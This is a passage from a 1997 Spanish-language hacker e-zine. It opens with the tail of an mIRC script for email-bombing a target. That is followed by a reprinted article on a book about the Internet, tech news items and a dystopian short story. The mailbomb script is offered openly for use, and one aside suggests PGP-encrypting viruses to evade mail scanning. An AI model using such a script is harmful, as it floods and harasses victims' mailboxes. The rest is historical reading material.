msg = $+ %mail.me %mail.txt
msg = $+ %mail.me .
echo = $+ %mail.me 4  %mailbomb  Mails enviados.
if (%mailbomb >= %mail.bombs) { close -c %mail.me | .disable #mail |
echo -a 4Fueron enviados  $+ %mailbomb $+  mails a %mail.to | unset
%mail.* }
.disable #mail
}

--------------------------------------------------------------------

Luego esto en el remote:
--------------------------------------------------------------------

on 1:chat:*Message accepted for delivery:{ mail }
#mail on
on 1:chatopen:{ if ($nick = $me) { set %mailbomb 0 | msg = $+ $me helo }
| set %mail.me $me }
on 1:chat:*pleased to meet you:{ mail | inc %mail.bomb | .disable #mail
}
#mail end

---------------------------------------------------------------------

Haaa!! Estas son bombas por e-mail, es muy bueno para bombardear ya que es
bastante rapido, para ejecutar la funcion solo teclea /mailb y listo, en
pantalla te pedira los datos.

ATTE: CaZadOR

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

[ He visto muchos articulos sobre Internet en periodicos, revistas y en
television pero la gran parte responden a interes economicos y unicamente
contribuyen al gran hype sobre internet y a la sobrepoblacion de la red.
Pero de vez en vez me encuentro con muy buenos articulos sobre la red que
son escritos por personas que analizan objetivamente los recursos de
internet. Esta vez dos escritores mexicanos contribuyen con sus articulos
al poco material objetivo sobre internet que sobrevive en algunos paises
del mundo. Disfruten. ]

Gozosamente atrapados en la pegajosa telara¤a de la red de Internet tejida
en el ciberespacio por todas las manos del mundo, Victor Flores Olea y Rosa
Elena Gaspar de Alba no se resistieron a la reflexion sobre su origen, su
significado y su impacto, para bien o para mal, en un mundo tan complejo como
el que habitamos.

El resultado de sus dudas, de su curiosidad, de sus busquedas, de su
necesidad de analisis y de interpretacion es el libro Internet y la
revolucion cibernetica, editado por Oceano y que comenzo a circular el jueves
pasado, luego de su presentacion formal la noche del jueves pasado en la
Casa Lamm.

Entre las muchas interrogantes que se formulan ahi el extitular del Consejo
Nacional para la Cultura y las Artes y la arqueologa Gaspar de Alba, figuran
las siguientes:

-¨Internet podra ser un dia controlado por unas cuantas corporaciones enormes
integradas verticalmente para a su vez controlar la produccion y la
distribucion de la informacion?

-¨En el desarrollo de Internet se limitara en el futuro la privacia,
perdiendose la libertad de palabra y de expresion, convirtiendose estos
valores unicamente en un recuerdo del pasado?

-¨Internet ahondara las diferencias entre paises pobres y ricos, y aun entre
pobres y ricos de un mismo pais, por el hecho de masivas desigualdades, mas
pronunciadas que ahora, en el acceso a la informacion?

-¨O bien, Internet contribuira a reducir esas diferencias y a difundir
informacion entre quienes carecen de ella?

-¨Internet propiciara una mayor responsabilidad de los gobiernos y una mayor
actividad politica de la sociedad, beneficiando a la mayoria con nuevos
estimulos educativos y con mayores beneficios economicos?

De 140 paginas, el volumen "no es un manual", advierte Flores Olea en
entrevista, aunque contiene una amplia seccion de "lexico cibernetico".
Se trata, dice, de un libro de reflexiones sobre las consecuencias del
Internet, sobre sus significados en lo politico, lo social, lo cultural: los
pros y los contras. Y adelanta: "En los terminos de Walter Benjamin, Internet
implica una democratizacion de la cultura."

E interroga: ¨si?, ¨no?: la discusion esta ahi.

En el origen, relata, Internet no era sino una estrategia de seguridad para
el gobierno norteamericano, que preservaba informacion clasificada en un
sistema descentralizado al modo de una telara¤a, que no fuera destruible por
acciones de guerra o por actos de sabotaje. Era, ilustra, como un hormiguero
sin central.

A pesar de su origen militar estrategico, Internet fue retomado luego por la
investigación cientifica y cultural para entrelazar a los academicos, a las
universidades. Mas tarde, se invento un protocolo de mayor amplitud, y el
circulo selectivo de instituciones comenzo a crecer hasta el punto que se
calcula que para el a¤o 2000 la red habra de contar con unos 300 millones de
usuarios en todo el mundo.

De modo que Internet y la revolucion cibernetica surge basicamente de la
experiencia de un par de usuarios, "sin mas pretensiones que la idea de
reflexionar sobre cual es el medio en el que nos estamos metiendo, cuales
son las implicaciones de tipo economico, cultural, politico y social que
podria tener"
.

Y se¤ala Flores Olea:

"Yo creo que Internet esta muy vinculado con el tema de la globalizacion,
que de hecho es una de las formas de la globalizacion contemporanea, de la
comunicacion planetaria, con las facilidades tecnicas, sencillas, que se
tienen, con la difusion extraordinaria de las computadoras personales, y con
el hecho de que con una llamada local se puede estar en contacto con
cualquier sitio del mundo y obtener documentacion. Esto es de una importancia
extraordinaria para la proliferacion de Internet."


Para Flores Olea, asimismo, "la tecnologia `per se' es indiferente, pero
depende de la estructura social y economica para la que se utilice"
. Explica
entonces:

"La television, a fin de cuentas, esta en manos del mercado, y todo su
contenido esta marcado por esos intereses economicos que han invertido en
ella, aunque hay paradojas, porque la competencia ha exigido que las cadenas
de television informen sobre una cantidad de cosas de las que normalmente no
tendrian por que informar, como las contradicciones de la sociedad, la
miseria, las enfermedades en Africa."


En este sentido, agrega, "una de las preguntas que nos hacemos es si Internet
es un instrumento de esta globalizacion del capitalismo, o si tiene ademas
otras consecuencias, y nosotros creemos que si esta dentro de la
globalizacion del capitalismo; es decir, sin el desarrollo y las
intercomunicaciones, y sin la necesidad de un mercado mundial como el que
plantea hoy el capitalismo, probablemente no se habria desarrollado
Internet"
.

Asi, advierte, "las previsiones son que el mercado mundial sera el dia de
ma¤ana un mercado a traves de Internet; en Estados Unidos ya lo estan
haciendo y nosotros estamos absolutamente atrasados"
.

Los autores sostienen en su libro "que tal vez esto sea imparable, pero
insistimos en que debe mantenerse tambien el aspecto cultural, creativo, de
informacion de otra naturaleza y no puramente mercantil"
. [ En eso estamos! ]

Observan, tambien, que "todo el aspecto social y politico que tiene Internet,
por ejemplo la presencia de las organizaciones no gubernamentales en el
mundo, es fundamental, y esto enlaza a las comisiones o grupos de derechos
humanos en el mundo, los que luchan por los grupos etnicos, por el medio
ambiente, por la mujer, la ni¤ez; todo el mundo de objetivos sociales, que
no son mercantiles, estan tambien presentes en Internet, entonces ahi
coexisten las preocupaciones por problemas sociales universales y locales"
.

Por ejemplo, dice, "una de las paginas mas actualizadas y que mas circulan en
Internet es la del Ejercito Zapatista de Liberacion Nacional"
.

Y analiza:

"Tenemos una muestra muy clara de como la aldea local, incluso marginada,
unos rebeldes confinados en una region de un pais, tienen una presencia en la
red absolutamente abierta, como la tienen la General Motors o la Casa Blanca.
Esta es una presencia que han logrado los zapatistas con un gran talento, y
por eso han tenido tanto reflejo en Europa, Canada y Estados Unidos. Incluso,
todos sus documentos están en un par de idiomas: ingles y frances. Asi, lo
que ocurre en un rincon del mundo se convierte en un tema universal. Yo creo
que este es de los aspectos mas positivos de Internet: la aldea global se
hace universal y lo universal llega a las localidades."


1997 Derechos Reservados, Comunicacion e Informacion S.A. de C.V.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.proceso.com.mx

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

Hasta pronto! No se cuanto se tarde en salir el siguiente numero o quien lo
ira a editar pero si se que estaremos esperando sus mensajes como siempre.
Si alguno de ustedes no recibio aviso cuando aparecio este numero mil
disculpas pero no todos los forms nos llegan asi que envia un mensaje por
e-mail solicitando estar en la lista y se soluciona todo.

" Cuando ser hacker se convierta en algo ilegal,
solo los delincuentes seremos hackers. "


[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð Dinamita - El mejor exploit para estrellar un sistema. ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

<< NotiLOONS >>
By Groovy

` La informacion necesaria para vivir sanamente '

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

Internet: La nueva droga
========================

Un joven de 17 a¤os enloquecio en un centro de rehabilitacion para
alcoholicos. Su cuerpo temblaba y arrojaba sillas y mesas alrededor. Estaba
sufriendo de abstencion, pero no de heroina, cocaina o alcohol...estaba
sufriendo por falta de internet.

En la costa oeste americana una mujer pasaba demasiado tiempo en el
ciberespacio que su esposo tuvo que divorciarse. En ese tiempo la mujer se
negaba a alimentar a sus hijos o llevarlos al doctor cuando ellos enfermaban.
Fue el New York Times el que puso en el reflector por primera vez la adiccion
a internet en USA. Hace apenas unos a¤os, el abuso de internet no era
conocido. Ahora mas y mas psicologos advierten sobre las consecuencias para
las personas que no puedan regular el uso de internet.

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

Los casinos en internet estan a punto de ser ilegales en USA. Tambien jugar
en ellos desde cualquier pais norteamericano sera ilegal si la propuesta es
aceptada.

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

El ultimo nuevo show de Beavis & Butthead es en septiembre 10 por MTV.

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

Microsoft anuncio el lanzamiento del dise¤ador mas vendido de paginas html
Frontpage 98. Una version Beta esta disponible en:
http://www.microsoft.com/frontpage/

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

Microsoft anuncio el lanzamiento oficial de Internet Explorer 4 para el 30 de
septiembre. Netscape responde ofreciendo el Navigator 4.0 sin ningun
componente en su website debido a un desacuerdo entre sus afiliados.

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

Varios Beta Testers junto con raretrip han sacado el nuevo programa SEND 2.1
que permite realizar comunicaciones por internet 100% seguras por email.
Obviamente para el funcionamiento optimo del programa es recomendado contar
con una copia de PGP para el DOS correctamente instalada pero el programa
puede hacer mensajes anonimos sin necesidad de usar PGP. El cambio mas
importante en esta version ha sido el manejo grafico de las opciones y asi
como una interfaz intuitiva para el usuario. amazing!

[ Poco antes de publicar este texto 18 (si asi es 18!) errores fueron
encontrados en la version Beta que se empezo a distribuir hace poco. Por
favor espera de una a dos semanas antes de bajar este programa en
http://www.geocities.com/Baja/4426/remail.zip
No te arrepentiras cuando lo veas funcionar correctamente ;-) ]

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

En Mexico se estan estudiando leyes contra los llamados "hackers" que se
dice cuestan mucho dinero a las compa¤ias afectadas. BBS y paginas web dentro
del territorio mexicano seran cuidadosamente examinadas.

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

Pretty Good Software ha terminado la ultima version de su programa Pretty
Good Privacy o PGP como comunmente se conoce. Esta version podra generar
llaves de encripcion de hasta 4096bits usando el algoritmo de llaves publicas
escrito por DSS/Diffie-Hellman que no es compatible con las versiones
anteriores de PGP.
Para poder usar el famoso algoritmo RSA es necesario un numero de licencia
disponible mediante un pago o consiguiendo el numero serie en algun website
de crackers.
La recomendacion de Phillip Zimmermann el creador de PGP es generar una
llave RSA de 2048bits usando el numero serie para solucionar problemas de
compatibilidad con antiguas versiones. Otra recomendacion es generar una
llave RSA usando alguna version internacional para DOS y despues usarla con
esta nueva version para Windows 95.

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

Microsoft empieza a restar importancia a Windows 98, llamandolo una peque¤a
actualizacion. Se espera que este listo para el proximo Abril.

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

Un juez federal decidio que las restricciones de los Estados Unidos de
Norteamerica respecto a la exportacion de software de encripcion son
anticonstitucionales. El juez de distrito Marilyn Hall Patel decidio no
permitir al gobierno estadounidense regular los algoritmos de encripcion
ni someter a penas a las personas que discutan sus algoritmos con personas
de otros paises. ­ victoria !
Los algoritmos patentados como RSA necesitaran de una licencia para poder
ser usados en piezas de software. Los cypherpunks del mundo entero estan
felices con el resultado, por fin le han ganado al "gran hermano". Ahora
solo hace falta educar a las masas sobre el uso de la encripcion dijo
Zimmermann cuando fue entrevistado.

+=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

Bigfoot International Inc. y McAfee Associates han lanzado un poderoso y
centralizado sistema de proteccion de virus para el email. Con este nuevo
sistema todos los mensajes que sean enviados a una direccion de bigfoot asi
como los attachments seran revisados de virus automaticamente con una version
siempre actualizada de VirusScan antes de entregarlos al due¤o de la cuenta.
Este servicio que aun esta en Beta Testing es uno de los mas innovadores
hasta el momento. Desgraciadamente el otro lado de la moneda es que siguen
las grandes compa¤ias apoderandose del territorio de todos ... internet.
El servicio estara disponible para todo el mundo GRATIS desde el primero de
septiempre en www.bigfoot.com

[ Si se deciden a enviarnos un virus a nuestra direccion codifiquenlo con
PGP para que pueda pasar por este nuevo sistema. Otra alternativa es que
manden el mensaje a raretrip@cyberdude.com para eviar que Bigfoot lo
revise de virus :-) ]

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð RareGaZz - What a Gas! ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

P R O H I B I D O P E N S A R
(cuento)
Han pasado casi cuarenta a¤os desde que se inicio la era de Tecno y con ella
el retroceso del hombre de Humania. Cuarenta a¤os que se puso en juego el
futuro de sus generaciones; que sus instituciones fueron desquebrajadas. Del
abatimiento de sus tradiciones por los efectos de la transculturacion; de esa
gran invasion organizada en la que el consumo fue la clave de penetracion. La
dependencia y el dominio le dieron forma a esta epoca de crisis donde los
valores infrahumanos se preconizaron directa y subliminalmente, hasta alcanzar
el reinado de los sentidos sobre la razon. Al principio nadie se dio cuenta.
Eran la novedad, la moda. Unos cuantos tachados de locos fueron los que se
opusieron a la invasion de Tecno. Aunque sutil en el principio, fue
gradualmente efectiva al paso del tiempo.

En este estado de cosas empieza nuestra historia. Sucedio en Adanes lugar
apartado de las fronteras de Pragma, patria de Tecno. Aqui, la invasion no
habia causado sus efectos totales. Nuestro personaje principal; un joven de
dieciocho a¤os dinamico y rebelde, llamado Cultus, quien ha descubierto en la
naturaleza la esperanza que sus amigos siquiera imaginan. Victimas de la
enagenacion programada, buscan en Cultus la liberacion y el reencuentro con
la luz del saber.

Reanudada la platica del dia anterior, Cultus mira fijamente a sus dos
compa¤eros; mueve la cabeza en signo afirmativo y dice: -El tio Memo me cuenta,
que cuando Tecno llego, a traves de las editoriales saboteo el derecho a la
cultura; impuso precios criminales a los libros y alejo en tal forma, a la
gente de Humania, de la lectura.
Pronto establecio nuevas formas de control social por medio de la
mediatizacion de la ense¤anza, socavando los cimientos de nuestras culturas y
tradiciones principalmente, por medio de su corriente transcultural; cuando
pondero la violencia, la ganancia rapida y facil; el desprecio hacia la vida
y la naturaleza. Asi sometio a nuestros hermanos a una existencia meramente
sensorial. Sin rostro, casi hemos perdido nuestra identidad ideal, con su
proyector de imagenes. Todo esto formo parte del mismo complot, el bloqueo de
la comunicacion familiar, la enagenacion masiva...

En sus acostumbradas interrupciones Albion exclamo enfatico:
-Es cierto Cultus, el mundo se volvio loco y quiere lucir como cuerdo adorando
a Tecno.
-¨Quien esta cuerdo Cultus? dijo Zigo para desviar un poco la irrupcion de
Albion
-¨Estamos fuera de contexto? -¨Nuestra terquedad por buscar la verdad nos hace
diferentes a los demas?
-Nos buscamos y en este proceso nos encontramos solos, ¨unicamente para
concluir que nos hemos alejado de los demas?
-¨Este es el precio que tenemos que pagar para encontrarnos? (reflexionando
brevemente) continuo:
-No es facil ignorar el rechazo de los demas, ni reconocer que tienen la
fuerza, pero no la razon. Sientes que a medida que te alejas de tu origen, el
objetivo pierde cada vez mas sentido con lo que fuiste, con lo que fue tu
identidad, tu numero, tu nombre; con lo que reclamas, con lo que no puedes
mostrar, so pena de ser declarado loco o tecnodesadaptado.
- Si Zigo. Acepto Cultus, asintiendo levemente con la cabeza.
-No se puede acallar un eco gritandole que guarde silencio y la duda de la
duda no es suficiente para asirse a la razon. Yo odio que se me mire como
extra¤o; como si hubiera sido afectado por algun nuevo virus producto de
nuestra avanzada biogenetica.( Laconicamente ironico sonrio y continuo ):
-¨Por que? -¨Por pensar? -¨Por querer ser diferente de los demas?.
- En eso estoy totalmente de acuerdo. Dijo Albion enfatizando:
-El otro dia, encontre en un viejo libro una frase que me hizo dudar...
- Decia: " DEJAR HACER DEJAR PASAR, EL MUNDO MARCHA POR SI MISMO ".
-¨Esto quiere decir que debemos conformarnos con la desaparicion de Humania?
-¨Realmente nos estamos oponiendo al progreso, a lo inevitable? - O
simplemente somos el ultimo reducto de quienes nos negamos a dejar de so¤ar.
-De quienes nos oponemos a la tecnoenagenacion y al empobrecimiento de los
valores humanos, inutilmente...
- Es verdad Albion. Dijo Zigo. -Muchas veces lo he pensado. Tecno a traves
del cultivo y expansion de nuestras necesidades, incremento nuestra
dependencia, desviandonos a un camino sin retorno para abolir la libertad.
-Sin derramar una sola gota de sangre nos empujo en una caida total en nuestra
propia antitesis.
-En pocas palabras, nos entregamos nosotros mismos. -No se trata de paranoia
ni miedo existencial. -Nada mas tienes que abrir los ojos y ver, no mirar
simplemente, VER con la razon que estamos proximos a la extincion total.
-Humania esta casi perdida; de esto pocos se dan cuenta Cultus, y de ellos, a
pocos les importa nada que asi suceda.
-Yo no te pregunto quien tiene la razon, sino ¨que es la razon? Cultus...

Con cierto enfado Cultus contesto:

-Creo que la razon se perdio hace algun tiempo, cuando la filosofia quedo
pre¤ada al final de una epoca de obscuridad llamada edad media; tuvo esta una
hija a quien llamaron ciencia. Identica a su madre, solo trajo al nacer dos
defectos congenitos: La miopia y la falta de "CON". Precisamente por esto su
madre la llamo ciencia.
-Y creeme Zigo, aunque todo el mundo lo calle, esta es la verdadera madre de
Tecno, nuestro tirano.

- Lo dices como si ya lo hubieras aceptado Cultus. Dijo Albion.
- De ninguna manera, exclamo Cultus. -El unico objeto de mi vida es que
Humania vuelva a ser Humania; que nuestra tierra recupere la salud
reinstaurando el respeto a nuestra verdadera madre, la naturaleza.
-Debemos recuperar el equilibrio que se perdio y volver a tener como unica
meta del ser humano el sentido de la verdad.
- Espera Cultus. Interrumpio Albion.
-El otro dia dijiste que la verdad era el arma mas potente para recuperar la
libertad, y ¨ahora nos dices que...¨es nuestra unica meta? ¨Pero es acaso que
existe esta poderosa arma? -¨Es posible encontrarla?...-¨Que es la verdad
Cultus?

Mirando fijamente a los ojos de sus compa¤eros, Cultus aclaro la voz y dijo:
-Empezare por afirmar lo que entiendo por verdad. Para mi la verdad no tiene
tiempo ni espacio. -La verdad no puede estar sujeta al tiempo por que lo que
hoy es verdadero, necesariamente tiene que serlo ma¤ana y lo fue ayer y lo
sera dentro de millones de a¤os...
- ¨Cierto o no?. Y continuo:
-La verdad no puede tener espacio, por que lo que es verdad aqui,
necesariamente lo tendra que ser en todos los extremos del Universo, si no,
no seria verdad. Es verdad en Pragma, es verdad en Humania, es verdad en la
Luna y en la galaxia mas remota.
-¨No es cierto? - Ademas, las verdades son indestructibles. Y ningun objeto
de la naturaleza puede encarnarlas, por que no son de este mundo. Cualquier
cosa al paso del tiempo se desmerita, nada material permanece inmutable y ¨en
donde seria posible depositar pues, una verdad si los objetos tangibles estan
imposibilitados para ello?. Cierto es que de alguna manera pueden estos
reflejarla, pero solo en esencia.

- Es decir Cultus, dijo Albion. -¨Que esta arma pertenece a otro mundo, que
es omnipresente? -¨Que no podemos verla ni tocarla? ¨que esta mas alla de
nuestra tercera dimension? -¨Pero que es real? -¨No estaras abusando de la
imaginacion? ¨Puede ser eso posible? -No? - Y ¨como puedo yo darme cuenta de
su existencia? ¨como puedo ingresar a ese mundo en donde no hay tiempo ni
espacio? -¨Es esta la cuarta dimension? -Por favor Cultus! no hagas que pierda
la razon. Dime una verdad, una sola con todas estas caracteristicas y te
creere, exclamo Albion, al borde de la histeria.

- Calmate Albion, deja que Cultus nos explique. Dijo Zigo tratando de
tranquilizarlo.
- Miren, continuo Cultus. -Yo creo que una de las cosas mas grandes que el
humano ha inventado es el lenguaje; es su codigo de comunicacion natural. A
traves del lenguaje se pueden hacer sensibles a nuestros sentidos casi todas
las verdades.
-Observen. Cultus tomo un poco de tiza del piso de la habitacion y con esta
dibujo el numero UNO en la pared.
Casi inmediatamente Albion se puso de pie y al tiempo que sonreia burlonamente
borro con su mano el numero dibujado por Cultus, exclamando:
-Dijiste que la verdad era indestructible y mira ya no existe!.
-Solo has borrado el simbolo con el que significamos a la unidad; la verdad
es que la UNIDAD, es una IDEA y esta es indestructible, ¨Quien puede destruir
una idea? esta habita en un mundo maravilloso al que solo puedes ingresar con
tu mente, un mundo al que Tecno te quiere vedar la entrada atrofiandote el
cerebro, enga¤andote con la patra¤a que lo material es lo unico que importa;
y te seduce con una mentira, que no existe, que lo mas placentero es
entregarse al goce de los sentidos.

-¨QUIEN EXISTE ENTONCES CULTUS?
¨QUIEN QUIERE SABERLO?
-YO !!!
- En efecto, no tu mano, tu pie, sino la parte de ti que mas ha evolucionado,
aquella que domina la materia; aquella que te hace ser humano; lo que
trasciende al tiempo y al espacio. Lo que muere de nuestros grandes hombres,
es lo que menos importa de ellos.
- Eso creo dijo Zigo. -Atentar contra la libertad fisica es bestial; pero ir
en contra de la libertad interior, solo podria ocurrirsele a Tecno. La carcel
interior es la automatizacion, Albion. Todo lo que tienes que hacer para ser
libre, es pensar.
Todo lo que tienes que hacer para ser humano, es pensar bien. Es por eso que
Tecno, al decretar la prohibicion del pensamiento, le ha dado mas vida a la
libertad. ¨Hay seduccion mas peligrosa que la de perder la fe?.¨Hay reto mas
grande que el amable azar? No Albion. Nuestra naturaleza no se equivoca; al
tigre, le dio garras; al ave, la doto de alas; al oso le proporciono de gran
pelambre y fuerza para subsistir a los embates del tiempo y sus enemigos. ¨No
se te hace injusto, aparentemente, que nosotros los humanos carezcamos de todo
esto, o bien que seamos los hijos predilectos de nuestra madre? -¨Que nos hace
diferentes al resto de nuestros hermanos del reino animal?. ¨Que funcion nos
distingue de las bestias, Albion?

- Creo que el razonamiento Zigo.
-¨Como dirimen las bestias sus diferencias?
- Con la fuerza, con la violencia.
- Y si al hombre se le entorpece esta facultad, ¨que crees que suceda?
- Lo que sucede en Pragma: Los asesinatos en masa, los motines, las guerras
provocadas con absurdos pretextos, el abuso de la fuerza, el suicidio mediato
e inmediato a traves de los toxicos, la paz, mantenida con la amenaza.
- Verdad que la libertad es una condicion humana, sin patente, sin
nacionalidad.
- Yo te pregunto Albion: -¨Que le hace al hombre de Humania ser humano? vivir
en armonia con su entorno, en verdadera paz; ser sensible a la problematica
existencial; interesarse por el futuro; tener esperanza, amar, buscar alcanzar
los valores que le perfeccionan en su nucleo; apreciar la belleza, el arte,
aspirar a ser creador, reconocer ser parte de un TODO. Con tradicion, con
rostro, con una cultura propia. Articulado a esta, tiene sentido su ser;
desarticulado, es basura, contaminacion, muerte.
- El humanismo debe ser defendido con sus propias armas; con la razon; ha
sido la lucha de todos los justos de todos los tiempos. Los contrarios forman
el SER, es cierto, el antagonismo eterno es otra verdad; pero tambien lo es,
el equilibrio, la armonia que expresa en su afan la luz como maxima expresion
de libertad, y la gravitacion como su extremo, su opuesto justo.
- Es la repeticion de la historia Cultus, recuerda que siempre los barbaros
han invadido a las grandes culturas, como sucedio en Grecia, como sucedio en
Roma, como sucedio en Mexico, socavando sus estructuras,su cultura, sus
tradiciones. Hasta dejarlas como piezas de museo.
- Observa como en nuestras instituciones educativas, prevalece la indigencia
academica, la mediatizacion de la ense¤anza y el condicionamiento operante ha
hecho estragos en las mentes de nuestros hermanos; la sintetizacion del
conocimiento los ha desarticulado de la realidad; casi se han proscrito la
critica y el analisis para anular cualquier brote de disidencia y asegurar
paz y continuidad a los sistemas implantados por Tecno. Solo el libertinaje
fisico es subsidiado por nuestro tirano. El Humanismo libre fue trocado por
el automatismo institucional. La era de la inbecivilizacion anuncia el inicio
del caos.

- ¨Quieres decir Zigo, que la mejor manera de dominar a un pueblo es a traves
de la distorcion de sus sistemas educativos?, pregunto Albion.
- Efectivamente, asi como puede obtenerse el progreso de un pueblo, es tambien
la manera mas sutil, mas moderna de controlarlo; en la epoca de la
especializacion, el humano quiere ya parecerse o ser una maquina y olvidandose
que es parte de la naturaleza, inventar en el Universo un mundo aparte.
-¨No resulta esto aberrante?.
- Debemos rebelarnos, luchar. Cultus se lleva las manos a la cabeza,
peinandose el pelo hacia atras al tiempo que dice:
-No todo esta perdido. Debemos iniciar la defenza de Humania con las unicas
armas que conocemos: Las ideas del Humanismo.

Han pasado ya algunos a¤os desde aquellas reuniones en que Cultus, Albion y
Zigo decidieron iniciar la lucha. Adanes ha cambiado, ya no es una peque¤a
ciudad; en ella se respira, a decir de los visitantes, cierto aire que los
invita a so¤ar, a pensar; a eso se debe que haya sido rebautizada como el
lugar de los so¤adores, de los poetas, pintores, cantores; de los que aman el
ARTE.

Por Escudo Humeante
(pacal)

Tecno=Tecnologia
Ciencia=Sin conciencia

Se autoriza su copia y distribucion siempre y cuando no se utilize con fines
de lucro o personales.

[ Gracias por haberlo enviado. Para no utilizarlo con fines de lucro no fue
vendido y para evitar ganar lectores gracias al texto no lo incluimos en
el indice :-) ]

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð -EOF- -EOF- -EOF- -EOF- EOF- -EOF- -EOF- -EOF- ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT